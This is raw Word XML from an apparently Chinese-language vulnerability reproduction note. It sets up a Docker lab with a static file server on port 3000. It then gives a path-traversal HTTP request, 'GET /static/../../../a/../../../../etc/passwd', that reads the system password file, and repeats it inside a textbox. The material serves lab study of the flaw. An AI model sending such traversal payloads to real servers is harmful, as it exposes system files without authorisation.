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247D4F" w:rsidRDefault="00247D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61" w:rsidRDefault="008B186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docker-compose build</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00247D4F" w:rsidRDefault="00247D4F">
                            <w:r w:rsidRPr="00247D4F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8B1861" w:rsidRDefault="008B1861">
                      <w:pPr>
                        <w:rPr>
                          <w:rFonts w:hint="eastAsia"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:t>docker-compose build</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00247D4F" w:rsidRDefault="00247D4F">
                      <w:r w:rsidRPr="00247D4F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247D4F" w:rsidRDefault="00247D4F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2、访问</w:t>
      </w:r>
      <w:r>
        <w:t>300</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0端口，可看到w</w:t>
      </w:r>
      <w:r>
        <w:t>eb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>页面，其中引用了文件/</w:t>
      </w:r>
      <w:r>
        <w:t>static/main.js</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，说明其存在静态文件服务器</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00247D4F" w:rsidRDefault="00247D4F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00247D4F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3434715" cy="967105"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="3" name="图片 3" descr="C:\Users\Toby\AppData\Local\Temp\165372885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72885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19" w:rsidRDefault="005B1A19"/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5B1A19" w:rsidRDefault="00247D4F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1、发送如下数据包，成功读取/</w:t>
      </w:r>
      <w:r>
        <w:t>etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00247D4F" w:rsidRDefault="00247D4F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="5275385" cy="1404620"/>
                <wp:effectExtent l="0" t="0" r="2095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D4F" w:rsidRPr="00247D4F" w:rsidRDefault="00247D4F" w:rsidP="00247D4F">
                            <w:r w:rsidRPr="00247D4F">
                              <w:t>GET /static/../../../a/../../../../etc/passwd HTTP/1.1</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00247D4F" w:rsidRPr="00247D4F" w:rsidRDefault="00247D4F" w:rsidP="00247D4F">
                            <w:r w:rsidRPr="00247D4F">
                              <w:t>Host: your-ip:3000</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00247D4F" w:rsidRPr="00247D4F" w:rsidRDefault="00247D4F" w:rsidP="00247D4F">
                            <w:r w:rsidRPr="00247D4F">
                              <w:t>Accept: */*</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00247D4F" w:rsidRPr="00247D4F" w:rsidRDefault="00247D4F" w:rsidP="00247D4F">
                            <w:r w:rsidRPr="00247D4F">
                              <w:t>Accept-Language: en</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00247D4F" w:rsidRPr="00247D4F" w:rsidRDefault="00247D4F" w:rsidP="00247D4F">
                            <w:r w:rsidRPr="00247D4F">
                              <w:t>User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00247D4F" w:rsidRDefault="00247D4F" w:rsidP="00247D4F">
                            <w:r w:rsidRPr="00247D4F">
                              <w:t>Connection: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">
                <v:textbox style="mso-fit-shape-to-text:t">
                  <w:txbxContent>
                    <w:p w:rsidR="00247D4F" w:rsidRPr="00247D4F" w:rsidRDefault="00247D4F" w:rsidP="00247D4F">
                      <w:r w:rsidRPr="00247D4F">
                        <w:t>GET /static/../../../a/../../../../etc/passwd HTTP/1.1</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00247D4F" w:rsidRPr="00247D4F" w:rsidRDefault="00247D4F" w:rsidP="00247D4F">
                      <w:r w:rsidRPr="00247D4F">
                        <w:t>Host: your-ip:3000</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00247D4F" w:rsidRPr="00247D4F" w:rsidRDefault="00247D4F" w:rsidP="00247D4F">
                      <w:r w:rsidRPr="00247D4F">
                        <w:t>Accept: */*</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00247D4F" w:rsidRPr="00247D4F" w:rsidRDefault="00247D4F" w:rsidP="00247D4F">
                      <w:r w:rsidRPr="00247D4F">
                        <w:t>Accept-Language: en</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00247D4F" w:rsidRPr="00247D4F" w:rsidRDefault="00247D4F" w:rsidP="00247D4F">
                      <w:r w:rsidRPr="00247D4F">
                        <w:t>User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00247D4F" w:rsidRDefault="00247D4F" w:rsidP="00247D4F">
                      <w:r w:rsidRPr="00247D4F">
                        <w:t>Connection: close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7D4F" w:rsidRDefault="00247D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83AC6" wp14:editId="5D89414E">
            <wp:extent cx="5274310" cy="408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30" w:rsidRDefault="004A2030" w:rsidP="005B1A19">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="004A2030" w:rsidRDefault="004A2030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30" w:rsidRDefault="004A2030" w:rsidP="005B1A19">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="004A2030" w:rsidRDefault="004A2030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247D4F"/>
    <w:rsid w:val="00402DD8"/>
    <w:rsid w:val="004A2030"/>
    <w:rsid w:val="005B1A19"/>
    <w:rsid w:val="008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6F9E0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2022-05-28T05:25:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-05-28T09:17:00Z</dcterms:modified>
</cp:coreProperties>
</file>